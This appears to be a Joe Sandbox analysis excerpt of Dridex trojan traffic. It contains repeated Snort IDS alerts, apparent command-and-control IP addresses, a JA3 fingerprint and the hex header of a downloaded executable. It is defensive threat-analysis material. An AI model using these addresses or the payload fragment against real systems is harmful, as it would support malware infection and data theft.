Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49259
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49262
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49263
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49263
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49265
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49266
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49267
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49267
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49269
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49270
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49273
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49274
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49275
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49275
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49277
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49279
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49279
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49281
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49282
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49285
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49286
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49287
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49287
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49290
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49291
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49291
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49293
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49294
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49298
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49299
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49299
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49301
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49302
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49305
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49306
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49307
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49307
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49309
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49310
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49311
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49311
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49314
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49317
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49318
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49319
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49319
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49321
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49322
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49323
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49323
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49325
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49327
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49327
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49329
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49330
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49331
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49331
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49333
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49334
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49335
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49335
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49337
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49338
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49339
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49339
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49341
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49342
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49343
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49343
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49345
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49346
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49347
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49347
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49349
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49350
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49351
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49351
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49353
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49354
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49355
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49355
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49357
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49358
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49359
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49359
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49362
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49363
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49366
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49367
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49370
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49371
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49374
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49375
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49378
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49379
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49382
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49383
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49386
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49387
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49390
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49391
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49394
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49395
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49398
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49399
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400

Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 80.86.91.27:3308
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 5.100.228.233:3389
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 46.105.131.65:1512

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 12 Jan 2021 00:43:52 GMTserver: Apachelast-modified: Mon, 11 Jan 2021 16:51:11 GMTaccept-ranges: bytescontent-length: 318976content-type: application/x-rar-compressedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 1c 9a fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 5.100.228.233 5.100.228.233
Source: Joe Sandbox View	IP Address: 80.86.91.27 80.86.91.27
Source: Joe Sandbox View	IP Address: 46.105.131.65 46.105.131.65
Source: Joe Sandbox View	IP Address: 77.220.64.37 77.220.64.37

Source: Joe Sandbox View	ASN Name: SENTIANL SENTIANL
Source: Joe Sandbox View	ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Source: global traffic

